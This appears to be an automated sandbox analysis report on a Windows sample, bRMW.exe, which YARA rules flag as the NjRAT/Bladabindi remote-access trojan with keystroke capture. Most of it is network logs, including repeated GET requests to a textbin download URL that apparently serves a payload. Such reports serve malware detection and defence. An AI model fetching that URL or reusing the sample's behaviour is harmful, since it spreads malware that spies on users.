              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: bRMW.exe, 00000000.00000002.4453788161.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pt.textbin.net
              Source: bRMW.exe, 00000000.00000002.4453788161.00000000033E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: bRMW.exe, 00000000.00000002.4453788161.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://textbin.net
              Source: bRMW.exe, 00000000.00000002.4453788161.0000000003520000.00000004.00000800.00020000.00000000.sdmp, bRMW.exe, 00000000.00000002.4453788161.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pt.textbin.net
              Source: bRMW.exeString found in binary or memory: https://pt.textbin.net/download/rcd5ihynxw
              Source: unknownDNS traffic detected: queries for: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49774 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49775 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49776 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49777 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49779 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49781 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49782 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49785 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49787 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49790 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49793 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49794 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49797 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49800 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49808 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49809 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49810 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49811 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49813 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49815 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49816 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49817 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49818 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49819 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49820 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49821 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49822 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49823 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49826 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49827 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49828 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49829 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49830 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49831 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49832 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49833 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49834 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49836 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49837 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49839 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49840 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49841 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49842 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49843 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49844 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49845 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49846 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49847 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49848 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49850 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49851 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49852 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49853 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49854 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49855 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49856 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49857 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49858 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49859 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49860 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49861 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49862 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49863 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49864 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49865 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: bRMW.exe, kl.cs.Net Code: VKCodeToUnicode

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: bRMW.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bRMW.exe PID: 2748, type: MEMORYSTR

              System Summary

              barindex
              Source: bRMW.exe, type: SAMPLEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
              Source: bRMW.exe, type: SAMPLEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: bRMW.exe, type: SAMPLEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
              Source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
              Source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
              Source: 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
              Source: bRMW.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
